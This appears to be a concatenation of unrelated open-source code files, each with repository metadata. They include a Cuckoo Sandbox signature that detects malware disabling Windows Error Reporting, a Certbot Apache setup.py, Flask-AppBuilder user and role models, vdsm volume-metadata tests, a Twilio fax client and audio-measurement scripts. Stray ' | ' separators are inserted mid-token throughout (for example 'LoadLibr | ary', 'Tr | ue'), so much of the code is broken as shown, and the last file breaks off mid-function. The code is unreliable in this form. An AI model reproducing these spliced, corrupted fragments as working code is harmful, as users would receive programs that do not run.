lixiangning888/whole_project | modules/signatures_orignal/disables_wer.py | Python | lgpl-3.0 | 645 | 0.003101 | # Copyright (C) 2015 Kevin Ross
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
from lib.cuckoo.common.abstracts import Signature
class DisablesWER(Signature):
name = "disables_wer"
description = "Attempts to disable Windows Error Reporting"
severity = 3
categories = ["stealth | "]
authors = ["Kevin Ross"]
minimum = "1.2"
def run(self):
| if self.check_write_key(pattern=".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Windows\\\\Windows\\ Error\\ Reporting\\\\Disabled$", regex=True):
return True
return False
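# e.g. the pattern above matches a write to
# HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Disabled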
|
jsha/letsencrypt | certbot-apache/setup.py | Python | apache-2.0 | 2,131 | 0 | import sys
from setuptools import setup
from setuptools import find_packages
version = '0.20.0.dev0'
# Please update tox.ini when modifying dependency version requirements
install_requires = [
'acme=={0}'.format(version),
'certbot=={0}'.format(version),
'mock',
'python-augeas',
# For pkg_resources. >=1.0 so pip resolves it to a version cryptography
# will tolerate; see #2599:
'setuptools>=1.0',
'zope.component',
'zope.interface',
]
docs_extras = [
'Sphinx>=1.0', # autodoc_member_order = 'bysource', autodoc_default_flags
'sphinx_rtd_theme',
]
setup(
name='certbot-apache',
version=version,
description="Apache plugin for Certbot",
url='https://github.com/letsencrypt/letsencrypt',
author="Certbot Project",
author_email='client-dev@letsencrypt.org',
license='Apache License 2.0',
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Plugins',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Internet :: WWW/HTTP' | ,
'Topic :: Security',
'Topic :: System :: Installation/Setup',
'Topic :: System :: Networking',
'Topic :: System | :: Systems Administration',
'Topic :: Utilities',
],
packages=find_packages(),
include_package_data=True,
install_requires=install_requires,
extras_require={
'docs': docs_extras,
},
entry_points={
'certbot.plugins': [
'apache = certbot_apache.configurator:ApacheConfigurator',
],
},
test_suite='certbot_apache',
)
|
davy39/eric | Helpviewer/UserAgent/__init__.py | Python | gpl-3.0 | 169 | 0 | # -*- coding: utf-8 -*-
# Copyright (c) 20 | 10 - 2014 Detlev Offenbach <detlev@die-offenbachs.de>
#
"""
Package implementing a menu to select the user agent string.
"""
| |
gromitsun/sim-xrf-py | others/scatt_bg/scatt_bg_c.py | Python | mit | 1,042 | 0.03071 | import ctypes
import numpy as np
import os
libpath = os.path.dirname(os.path.realpath(__file__))
lib = ctypes.cdll.LoadLibr | ary(libpath+'\libscatt_bg.so')
scatt_bg_c = lib.scatt_bg
scatt_bg_c.restype = ctypes.c_void_p # reset return types. default is c_int
scatt_bg_c.argtypes = [ctypes.c_double, ctypes.POINTER(ctypes.c_double), ctypes.c_int, ctypes.c_int]
subtend_c = lib.subtend
subtend_c.restype = ctypes.c_double # reset return types. default is c_int
subtend_c.argtypes = [ctypes.c_double, ctypes.c_double, ctypes.c_double, ctypes.c_double]
def scatt_bg(kev, | Z_max=98, theta_max=90):
# kev = np.asarray(kev)
out = np.zeros(Z_max*theta_max)
# Z_max = np.asarray(Z_max)
# theta_max = np.asarray(theta_max)
scatt_bg_c(ctypes.c_double(kev),out.ctypes.data_as(ctypes.POINTER(ctypes.c_double)),ctypes.c_int(Z_max),ctypes.c_int(theta_max))
return out
def subtend(theta0,theta1,beta0,beta1):
return subtend_c(ctypes.c_double(np.radians(theta0)), ctypes.c_double(np.radians(theta1)), ctypes.c_double(np.radians(beta0)), ctypes.c_double(np.radians(beta1)))
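# Usage sketch: background for 10 keV photons on the default Z/theta grid,
# plus the solid angle of a (hypothetical) detector opening.
if __name__ == '__main__':
    bg = scatt_bg(10.0)  # flat array of Z_max*theta_max entries
    print(bg.shape)
    print(subtend(0., 30., 0., 30.))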
|
dpgaspar/Flask-AppBuilder | flask_appbuilder/security/sqla/models.py | Python | bsd-3-clause | 5,212 | 0.001343 | import datetime
from flask import g
from sqlalchemy import (
Boolean,
Column,
DateTime,
ForeignKey,
Integer,
Sequence,
String,
Table,
UniqueConstraint,
)
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import backref, relat | ionship
from ... import Model
from ..._compat import as_unicode
_dont_audit = False
class Permission(Model):
__tablename__ = "ab_permission"
id = Column(Integer, Sequence("ab_permission_id_seq"), primary_key=True)
name = Column(String(100), unique=True, nullable=False)
def __repr__(self):
return self.name
class ViewMenu(Model):
__tablename__ = "ab_view_menu"
id = Column(Integer, Sequence("ab_view_menu_id_seq"), primary_key=Tr | ue)
name = Column(String(250), unique=True, nullable=False)
def __eq__(self, other):
return (isinstance(other, self.__class__)) and (self.name == other.name)
def __neq__(self, other):
return self.name != other.name
def __repr__(self):
return self.name
assoc_permissionview_role = Table(
"ab_permission_view_role",
Model.metadata,
Column("id", Integer, Sequence("ab_permission_view_role_id_seq"), primary_key=True),
Column("permission_view_id", Integer, ForeignKey("ab_permission_view.id")),
Column("role_id", Integer, ForeignKey("ab_role.id")),
UniqueConstraint("permission_view_id", "role_id"),
)
class Role(Model):
__tablename__ = "ab_role"
id = Column(Integer, Sequence("ab_role_id_seq"), primary_key=True)
name = Column(String(64), unique=True, nullable=False)
permissions = relationship(
"PermissionView", secondary=assoc_permissionview_role, backref="role"
)
def __repr__(self):
return self.name
class PermissionView(Model):
__tablename__ = "ab_permission_view"
__table_args__ = (UniqueConstraint("permission_id", "view_menu_id"),)
id = Column(Integer, Sequence("ab_permission_view_id_seq"), primary_key=True)
permission_id = Column(Integer, ForeignKey("ab_permission.id"))
permission = relationship("Permission")
view_menu_id = Column(Integer, ForeignKey("ab_view_menu.id"))
view_menu = relationship("ViewMenu")
def __repr__(self):
return str(self.permission).replace("_", " ") + " on " + str(self.view_menu)
assoc_user_role = Table(
"ab_user_role",
Model.metadata,
Column("id", Integer, Sequence("ab_user_role_id_seq"), primary_key=True),
Column("user_id", Integer, ForeignKey("ab_user.id")),
Column("role_id", Integer, ForeignKey("ab_role.id")),
UniqueConstraint("user_id", "role_id"),
)
class User(Model):
__tablename__ = "ab_user"
id = Column(Integer, Sequence("ab_user_id_seq"), primary_key=True)
first_name = Column(String(64), nullable=False)
last_name = Column(String(64), nullable=False)
username = Column(String(64), unique=True, nullable=False)
password = Column(String(256))
active = Column(Boolean)
email = Column(String(64), unique=True, nullable=False)
last_login = Column(DateTime)
login_count = Column(Integer)
fail_login_count = Column(Integer)
roles = relationship("Role", secondary=assoc_user_role, backref="user")
created_on = Column(DateTime, default=datetime.datetime.now, nullable=True)
changed_on = Column(DateTime, default=datetime.datetime.now, nullable=True)
@declared_attr
def created_by_fk(self):
return Column(
Integer, ForeignKey("ab_user.id"), default=self.get_user_id, nullable=True
)
@declared_attr
def changed_by_fk(self):
return Column(
Integer, ForeignKey("ab_user.id"), default=self.get_user_id, nullable=True
)
created_by = relationship(
"User",
backref=backref("created", uselist=True),
remote_side=[id],
primaryjoin="User.created_by_fk == User.id",
uselist=False,
)
changed_by = relationship(
"User",
backref=backref("changed", uselist=True),
remote_side=[id],
primaryjoin="User.changed_by_fk == User.id",
uselist=False,
)
@classmethod
def get_user_id(cls):
try:
return g.user.id
except Exception:
return None
@property
def is_authenticated(self):
return True
@property
def is_active(self):
return self.active
@property
def is_anonymous(self):
return False
def get_id(self):
return as_unicode(self.id)
def get_full_name(self):
return u"{0} {1}".format(self.first_name, self.last_name)
def __repr__(self):
return self.get_full_name()
class RegisterUser(Model):
__tablename__ = "ab_register_user"
id = Column(Integer, Sequence("ab_register_user_id_seq"), primary_key=True)
first_name = Column(String(64), nullable=False)
last_name = Column(String(64), nullable=False)
username = Column(String(64), unique=True, nullable=False)
password = Column(String(256))
email = Column(String(64), nullable=False)
registration_date = Column(DateTime, default=datetime.datetime.now, nullable=True)
registration_hash = Column(String(256))
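# Query sketch (assumes an active SQLAlchemy session `session`):
#
#   admin = session.query(Role).filter_by(name='Admin').one_or_none()
#   users = session.query(User).filter(User.roles.contains(admin)).all()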
|
EdDev/vdsm | tests/storage_volume_metadata_test.py | Python | gpl-2.0 | 6,516 | 0 | # Copyright 2016 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
import textwrap
import time
from testlib import make_uuid
from testlib import VdsmTestCase, permutations, expandPermutations
from monkeypatch import MonkeyPatchScope
from vdsm.storage import constants as sc
from vdsm.storage import exception as se
from storage import image, volume
MB = 1024 ** 2
FAKE_TIME = 1461095629
def make_init_params(**kwargs):
res = dict(
domain=make_uuid(),
image=make_uuid(),
puuid=make_uuid(),
size=1024 * MB,
format=sc.type2name(sc.RAW_FORMAT),
type=sc.type2name(sc.SPARSE_VOL),
voltype=sc.type2name(sc.LEAF_VOL),
disktype=image.SYSTEM_DISK_TYPE,
description="",
legality=sc.LEGAL_VOL,
generation=sc.DEFAULT_GENERATION)
res.update(kwargs)
return res
def make_md_dict(**kwargs):
res = {
sc.DOMAIN: 'domain',
sc.IMAGE: 'image',
sc.PUUID: 'parent',
sc.SIZE: '0',
sc.FORMAT: 'format',
sc.TYPE: 'type',
sc.VOLTYPE: 'voltype',
sc.DISKTYPE: 'disktype',
sc.DESCRIPTION: 'description',
sc.LEGALITY: 'legality',
sc.MTIME: '0',
sc.CTIME: '0',
sc.POOL: '',
sc.GENERATION: '1',
}
res.update(kwargs)
return res
def make_lines(**kwargs):
data = make_md_dict(**kwargs)
lines = ['EOF']
for k, v in data.items():
if v is not None:
lines.insert(0, "%s=%s" % (k, v))
return lines
@expandPermutations
class VolumeMetadataTests(VdsmTestCase):
def test_create_info(self):
params = make_init_params()
expected = dict(
CTIME=str(FAKE_TIME),
DESCRIPTION=params['description'],
DISKTYPE=params['disktype'],
DOMAIN=params['domain'],
FORMAT=params['format'],
IMAGE=params['image'],
LEGALITY=params['legality'],
MTIME="0",
POOL_UUID="",
PUUID=params['puuid'],
SIZE=str(params['size']),
TYPE=params['type'],
VOLTYPE=params['voltype'],
GEN=params['generation'])
with MonkeyPatchScope([[time, 'time', lambda: FAKE_TIME]]):
info = volume.VolumeMetadata(**params).legacy_info()
self.assertEqual(expected, info)
def test_storage_format(self):
params = make_init_params(ctime=FAKE_TIME)
expected = textwrap.dedent("""\
CTIME=%(ctime)s
DESCRIPTION=%(description)s
DISKTYPE=%(disktype)s
DOMAIN=%(domain)s
FORMAT=%(format)s
GEN=%(generation)s
IMAGE=%(image)s
LEGALITY=%(legality)s
MTIME=0
POOL_UUID=
PUUID=%(puuid)s
SIZE=%(size)s
TYPE=%(type)s
VOLTYPE=%(voltype)s
EOF
""" % params)
md = volume.VolumeMetadata(**params)
self.assertEqual(expected, md.storage_format())
@permutations([
[sc.DESCRIPTION_SIZE],
[sc.DESCRIPTION_SIZE + 1]
])
def test_long_description(self, size):
params = make_init_params(description="!" * size)
md = volume.VolumeMetadata(**params)
self.assertEqual(sc.DESCRIPTION_SIZE, len(md.description))
@permutations([['size'], ['ctime'], ['mtime']])
def test_int_params_str_raises(self, param):
params = make_init_params(**{param: 'not_an_int'})
self.assertRaises(AssertionError, volume.VolumeMetadata, **params)
@permutations([[key] for key in make_md_dict()
if key not in (sc.POOL, sc.GENERATION)])
def test_from_lines_missing_key(self, required_key):
data = make_md_dict(POOL=None)
data[required_key] = None
lines = make_lines(**data)
self.assertRaises(se.Met | aDataKeyNotFoundError,
volume.VolumeMetadata.from_lines, lines)
@permutations([[None], ['pool']])
def test_deprecated_pool(self, val):
lines = make_lines(**{sc.POOL: val})
md = volume.VolumeMetadata.from_lines(lines)
self.assertEqual("", md.legacy_info()[sc.POOL])
def test_from_lines_invalid_param(self):
| lines = make_lines(INVALID_KEY='foo')
self.assertNotIn("INVALID_KEY",
volume.VolumeMetadata.from_lines(lines).legacy_info())
@permutations([[sc.SIZE], [sc.CTIME], [sc.MTIME]])
def test_from_lines_int_parse_error(self, key):
lines = make_lines(**{key: 'not_an_integer'})
self.assertRaises(ValueError,
volume.VolumeMetadata.from_lines, lines)
def test_from_lines(self):
data = make_md_dict()
lines = make_lines(**data)
md = volume.VolumeMetadata.from_lines(lines)
self.assertEqual(data[sc.DOMAIN], md.domain)
self.assertEqual(data[sc.IMAGE], md.image)
self.assertEqual(data[sc.PUUID], md.puuid)
self.assertEqual(int(data[sc.SIZE]), md.size)
self.assertEqual(data[sc.FORMAT], md.format)
self.assertEqual(data[sc.TYPE], md.type)
self.assertEqual(data[sc.VOLTYPE], md.voltype)
self.assertEqual(data[sc.DISKTYPE], md.disktype)
self.assertEqual(data[sc.DESCRIPTION], md.description)
self.assertEqual(int(data[sc.MTIME]), md.mtime)
self.assertEqual(int(data[sc.CTIME]), md.ctime)
self.assertEqual(data[sc.LEGALITY], md.legality)
self.assertEqual(int(data[sc.GENERATION]), md.generation)
def test_generation_default(self):
lines = make_lines(GEN=None)
md = volume.VolumeMetadata.from_lines(lines)
self.assertEqual(sc.DEFAULT_GENERATION, md.generation)
|
twilio/twilio-python | twilio/rest/fax/v1/fax/__init__.py | Python | mit | 17,574 | 0.002105 | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import serialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
from twilio.rest.fax | .v1.fax.fax_media import FaxMediaList
class FaxList(ListResource):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
| def __init__(self, version):
"""
Initialize the FaxList
:param Version version: Version that contains the resource
:returns: twilio.rest.fax.v1.fax.FaxList
:rtype: twilio.rest.fax.v1.fax.FaxList
"""
super(FaxList, self).__init__(version)
# Path Solution
self._solution = {}
self._uri = '/Faxes'.format(**self._solution)
def stream(self, from_=values.unset, to=values.unset,
date_created_on_or_before=values.unset,
date_created_after=values.unset, limit=None, page_size=None):
"""
Streams FaxInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param unicode from_: Retrieve only those faxes sent from this phone number
:param unicode to: Retrieve only those faxes sent to this phone number
:param datetime date_created_on_or_before: Retrieve only faxes created on or before this date
:param datetime date_created_after: Retrieve only faxes created after this date
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.fax.v1.fax.FaxInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
from_=from_,
to=to,
date_created_on_or_before=date_created_on_or_before,
date_created_after=date_created_after,
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'])
def list(self, from_=values.unset, to=values.unset,
date_created_on_or_before=values.unset,
date_created_after=values.unset, limit=None, page_size=None):
"""
Lists FaxInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param unicode from_: Retrieve only those faxes sent from this phone number
:param unicode to: Retrieve only those faxes sent to this phone number
:param datetime date_created_on_or_before: Retrieve only faxes created on or before this date
:param datetime date_created_after: Retrieve only faxes created after this date
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.fax.v1.fax.FaxInstance]
"""
return list(self.stream(
from_=from_,
to=to,
date_created_on_or_before=date_created_on_or_before,
date_created_after=date_created_after,
limit=limit,
page_size=page_size,
))
def page(self, from_=values.unset, to=values.unset,
date_created_on_or_before=values.unset,
date_created_after=values.unset, page_token=values.unset,
page_number=values.unset, page_size=values.unset):
"""
Retrieve a single page of FaxInstance records from the API.
Request is executed immediately
:param unicode from_: Retrieve only those faxes sent from this phone number
:param unicode to: Retrieve only those faxes sent to this phone number
:param datetime date_created_on_or_before: Retrieve only faxes created on or before this date
:param datetime date_created_after: Retrieve only faxes created after this date
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of FaxInstance
:rtype: twilio.rest.fax.v1.fax.FaxPage
"""
data = values.of({
'From': from_,
'To': to,
'DateCreatedOnOrBefore': serialize.iso8601_datetime(date_created_on_or_before),
'DateCreatedAfter': serialize.iso8601_datetime(date_created_after),
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(method='GET', uri=self._uri, params=data, )
return FaxPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of FaxInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of FaxInstance
:rtype: twilio.rest.fax.v1.fax.FaxPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return FaxPage(self._version, response, self._solution)
def get(self, sid):
"""
Constructs a FaxContext
:param sid: The unique string that identifies the resource
:returns: twilio.rest.fax.v1.fax.FaxContext
:rtype: twilio.rest.fax.v1.fax.FaxContext
"""
return FaxContext(self._version, sid=sid, )
def __call__(self, sid):
"""
Constructs a FaxContext
:param sid: The unique string that identifies the resource
:returns: twilio.rest.fax.v1.fax.FaxContext
:rtype: twilio.rest.fax.v1.fax.FaxContext
"""
return FaxContext(self._version, sid=sid, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Fax.V1.FaxList>'
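# Usage sketch (account SID, token and number are placeholders):
#
#   client = Client('ACxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx', 'auth_token')
#   for fax in client.fax.v1.faxes.list(to='+15017122661', limit=20):
#       print(fax.sid, fax.status)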
class FaxPage(Page):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
def __init__(self, version, response, solution):
"""
Initialize the FaxPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:returns: twilio.rest.fax.v1.fax.FaxPage
:rtype: twilio.rest.fax.v1.fax.FaxPage
"""
super(FaxPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of FaxInstance
:param dict payload: Payload response from the API
:retu |
andreas-schmidt/tapetool | spiegel.py | Python | mit | 3,188 | 0.002823 | #!/usr/bin/env python
from __future__ import print_function
import numpy as np
from scipy.io import wavfile
def lmbinv(i, speed, fs, f1):
f0 = 10.
t1 = 20.
freq = f0 + (f1 - f0) * i / fs / t1
return freq / speed
def f_log(fs, i):
t = float(i) / fs
t1 = 10.
f0 = 20.
f1 = 20000.
return f0 * (f1 / f0)**(t / t1)
def db(x):
return 20 * np.log10(x)
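# e.g. db(0.5) == 20 * log10(0.5) ~ -6.02 dB (half amplitude)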
def run(fs, data, speed, length, outfile, f1, ref):
bs = int(fs * length)
norm = data * 1. / np.iinfo(data.dtype).max
bins = range(bs, len(data), bs)
chunked = np.split(norm, bins)
for i, c in enumerate(chunked[:-1]):
rms = np.sqrt(1. * np.sum(c**2, axis=0) / len(c))
print(
i,
lmbinv(bins[i], speed, fs, f1),
*db(rms / ref),
file=outfile)
def logfreq(fs, data, length, outfile, ref):
bs = int(fs * length)
norm = data * 1. / np.iinfo(data.dtype).max
bins = range(bs, len(data), bs)
chunked = np.split(norm, bins)
for i, c in enumerate(chunked[:-1]):
rms = np.sqrt(1. * np.sum(c**2, axis=0) / len(c))
print(
i,
f_log(fs, bins[i]),
*db(rms / ref),
file=outfile)
def tts(fs, t0, t1):
return slice(int(t0 * fs + 1), int(t1 * fs))
def get_reflevel(fs, data, s1):
c = 1. * data[tts(fs, s1 - 1., s1)] / np.iinfo(data.dtype).max
return np.sqrt(1. * np.sum(c**2, axis=0) / len(c))
def main(prefix, s1, s2, s3, title):
fs, data = wavfile.read(prefix + '.wav')
length = .1
ref = get_reflevel(fs, data, s1)
print(prefix, ref)
def r(t0, f1, speed, out):
run(fs,
data[tts(fs, t0, t0 + 20.)],
speed,
length,
open(out, 'w'),
f1,
ref)
t0p = t0 + 21.
reflog = get_reflevel(fs, data, t0p)
logfreq(fs,
data[tts(fs, t0p, t0p + 10.)],
length,
| open('logfreq-' + out, 'w'),
reflog)
r(s1, 2000., .1905, prefix + '-1905.dat')
r(s2, 1000., .0953, prefix + '-0953.dat')
r(s3, 500., .0476, prefix + '-0476.dat')
template = open('template.plt').read()
plt_l = template.format(title='L ' + title, prefix=prefix, col=3)
plt_r = template.format(t | itle='R ' + title, prefix=prefix, col=4)
open(prefix + '-l.plt', 'w').write(plt_l)
open(prefix + '-r.plt', 'w').write(plt_r)
template = open('template-freq.plt').read()
plt_l = template.format(title='L ' + title, prefix=prefix, col=3)
plt_r = template.format(title='R ' + title, prefix=prefix, col=4)
open(prefix + '-lf-l.plt', 'w').write(plt_l)
open(prefix + '-lf-r.plt', 'w').write(plt_r)
if __name__ == '__main__':
main('k-4502', 40.222818, 91.359767, 142.636910,
'4502 Halbspur Woelke')
main('k-5002', 40.224331, 91.363238, 142.645018,
'5002 Halbspur Woelke')
main('k-6002', 25.648929, 76.788175, 128.070287,
'6002 Halbspur Bogen (?)')
main('k-6004', 19.291440, 70.427377, 121.702700,
'6004 Viertelspur Ferrotronic')
main('k-vorb', 40.085222, 91.085239, 142.085246,
'vorband')
|
kactus2/kactus2dev | PythonAPI/ipmm_core_pkg/component.py | Python | gpl-2.0 | 2,871 | 0.009056 |
from ipmm_core_pkg.primitive import Primitive
from ipmm_core_pkg.addressBlock import AddressBlock
from ipmm_core_pkg.register import Register
from ipmm_core_pkg.field import Field
from ipmm_core_pkg.port import Port
from ipmm_core_pkg.parameter import Parameter
class Component(Primitive):
def __init__(self, name, description):
Primitive.__init__(self, name, description)
self.parameters = []
self.ports = []
self.buses = []
self.constants = []
self.signals = []
self.memoryMaps = []
self.behavior = []
self.renderers = []
# TODO: add type checking for the add_* methods
def add_parameter(self, parameter):
sel | f.parameters.append(parameter)
def add_port(self, port):
self.ports.append(port)
def add_constant(self, constant):
self.constants.append(constant)
def add_memoryMap(self, memoryMap):
self.memoryMaps.append(memoryMap)
def add_renderer(self, renderer): |
self.renderers.append(renderer)
## render can manipulate (remove, add, modify) parameters, ports, memorymaps
def render(self):
for r in self.renderers:
r()
def printer(self):
Primitive.printer(self)
for p in self.ports:
p.printer()
for c in self.constants:
c.printer()
for mm in self.memoryMaps:
mm.printer()
# Stand-a-lone testing
if __name__ == "__main__":
register_1 = Register("STAT", "Status register.", 2, 32)
field_1 = Field("RX-FIFO", "RX-FIFO Not Empty.", 0, 1, "read-only")
field_2 = Field("RXFIFO_OVFL", "X-FIFO Overflow.", 1, 1, "read-write")
## move this to rgister_if class
port_1 = Port(field_1.get_name()+"_input", "RX-FIFO Not Empty inout", "logic", field_1.get_bitWidth(), "input")
port_2 = Port(field_2.get_name()+"_output", "RX-FIFO Overflow output", "logic", field_2.get_bitWidth(), "output")
register_2 = Register("CMD", "Command register.", 4, 32)
field_3 = Field("Command", "Peripheral Command.", 0, 4, "read-write")
register_1.add_field(field_1)
register_1.add_field(field_2)
register_2.add_field(field_3)
addressBlock_1 = AddressBlock("PP_Address_Block", "Peripheral address block", 32, 32)
addressBlock_1.add_register(register_1)
addressBlock_1.add_register(register_2)
component_1 = Component("Helloder", "This components is Helloder")
component_1.add_port(port_1)
component_1.add_port(port_2)
component_1.add_memoryMap(addressBlock_1)
component_1.printer()
|
e2crawfo/dps | motmetrics/__init__.py | Python | apache-2.0 | 201 | 0.004975 |
from .mot import MOTAccumulato | r
import motmetrics.lap
import motmetrics.metrics
import motmetrics.distances
import motmetrics.io
import motmet | rics.utils
# Needs to be last line
__version__ = '1.1.3' |
ossobv/asterisklint | asterisklint/app/vall/app_softhangup.py | Python | gpl-3.0 | 870 | 0 | # AsteriskLint -- an Asterisk PBX config syntax checker
# Copyright (C) 2019 Walter Doekes, OSSO B.V.
#
# This program is free software: you ca | n redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at you | r option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from ..base import AppBase
class SoftHangup(AppBase):
pass
def register(app_loader):
app_loader.register(SoftHangup())
|
jimyx17/jimh | lib/simplejson/tool.py | Python | gpl-3.0 | 1,025 | 0.000976 | r"""Command-line tool to validate and pretty-print JSON
Usage::
$ echo '{"json":"obj"}' | python -m simplejson.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -m simplejson.tool
Expec | ting property name: line 1 column 2 (char 2)
"""
import sys
import lib.simplejson as json
def main():
if len(sys.argv) == 1:
infile = sys.stdin
outfile = sys.stdout
elif len(sys.argv) == 2:
infile = open(sys.argv[1], 'rb')
outfile = sys.stdout
elif len(sys.argv) == 3:
infile = open(sys.argv[1], 'rb')
outfile = open(sys.argv[2], 'wb')
| else:
raise SystemExit(sys.argv[0] + " [infile [outfile]]")
try:
obj = json.load(infile,
object_pairs_hook=json.OrderedDict,
use_decimal=True)
except ValueError, e:
raise SystemExit(e)
json.dump(obj, outfile, sort_keys=True, indent=' ', use_decimal=True)
outfile.write('\n')
if __name__ == '__main__':
main()
|
flaviovdf/pyksc | src/scripts/col_to_cluster.py | Python | bsd-3-clause | 7,933 | 0.012227 | # -*- coding: utf8
from __future__ import division, print_function
from collections import defaultdict
from matplotlib import pyplot as plt
from radar import radar_factory
from scipy import stats
from scripts import initialize_matplotlib
import numpy as np
import plac
import sys
REFERRER_ABBRV = {
'EXTERNAL':'EXT.',
'FEATURED':'FEAT.',
'INTERNAL':'INT.',
'MOBILE':'MOBI.',
'SEARCH':'SEAR.',
'SOCIAL':'SOC.',
'VIRAL':'VIR.'}
CATEG_ABBRV = {
'Autos&Vehicles':'Vehi.',
'Autos':'Vehi.',
'Comedy':'Com.',
'Education':'Edu.',
'Entertainment':'Ent.',
'Film':'Film',
'Film&Animation':'Film',
'Games':'Game',
'Gaming':'Game',
'Howto':'Howto',
'Howto&Style':'Howto',
'Movies':'Film',
'Music':'Music',
'NULL':'-',
'News':'News',
'News&Politics':'News',
'Nonprofit':'Nonprof.',
'Nonprofits&Activism':'Nonprof.',
'People&Blogs':'People',
'People':'People',
'Pets&Animals':'Pets',
'Pets':'Pets',
'Animals':'Pets',
'Science&Technology':'Sci.',
'Science':'Sci.',
'Tech':'Sci.',
'Shows':'Show',
'Sports':'Sport',
'Trailers':'Film',
'Travel&Events':'Travel',
'Travel':'Travel'}
def load_text_file(features_fpath, col_to_use, classes):
to_plot = defaultdict(lambda: defaultdict(float))
sum_classes = defaultdict(float)
labels = set()
with open(features_fpath) as features_file:
for curr_line, line in enumerate(features_file):
spl = line.split()
if col_to_use >= len(spl):
continue
data = CATEG_ABBRV[line.split()[col_to_use].strip()]
class_num = classes[curr_line]
labels.add(data)
sum_classes[class_num] += 1
to_plot[class_num][data] += 1
return to_plot, sum_classes, sorted(labels)
def load_svm_file(features_fpath, classes):
col_dict = {
'EXTERNAL':13,
'FEATURED':14,
'INTERNAL':15,
'MOBILE':16,
'SEARCH':17,
'SOCIAL':18,
'VIRAL':19
}
to_plot = defaultdict(lambda: defaultdict(float))
sum_classes = defaultdict(float)
labels = set()
with open(features_fpath) as features_file:
curr_line = 0
for line in features_file:
if '#' in line:
for key, id_ in col_dict.items():
print(id_, key, line.split()[id_])
continue
class_num = classes[curr_line]
sum_classes[class_num] += float(line.split()[-1])
for ref_name, col_id in col_dict.items():
ref_abbrv = REFERRER_ABBRV[ref_name]
val = float(line.split()[col_id])
present = val > 0
| if present:
labels.add(ref_abbrv)
to_plot[class_num][ref_abbrv] += val
curr_line += 1
return to_plot, sum_classes, sorted(labels)
def generate_data_plot(to_plot, sum_classes, labels, classes):
num_classes = len(set(classes))
colors = ['b', 'g', 'm', 'y']
total = 0
for class_n | um in xrange(num_classes):
color = colors[class_num]
data_plot = []
for label in labels:
total += to_plot[class_num][label]
data_plot.append(to_plot[class_num][label] / sum_classes[class_num])
yield data_plot, color, class_num
def radar_plot(labels, data_plots, out_fpath):
theta = radar_factory(len(labels))
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1, projection='radar')
for data_plot, color, class_num in data_plots:
ax.plot(theta, data_plot, color=color, label='C%d'%class_num)
ax.fill(theta, data_plot, facecolor=color, alpha=0.25)
ax.set_varlabels(labels)
plt.legend(frameon=False, ncol=4, bbox_to_anchor=(0.5, -0.15),
loc='lower center')
plt.savefig(out_fpath)
def chisq(counts, expected_prob):
counts = np.array(counts)
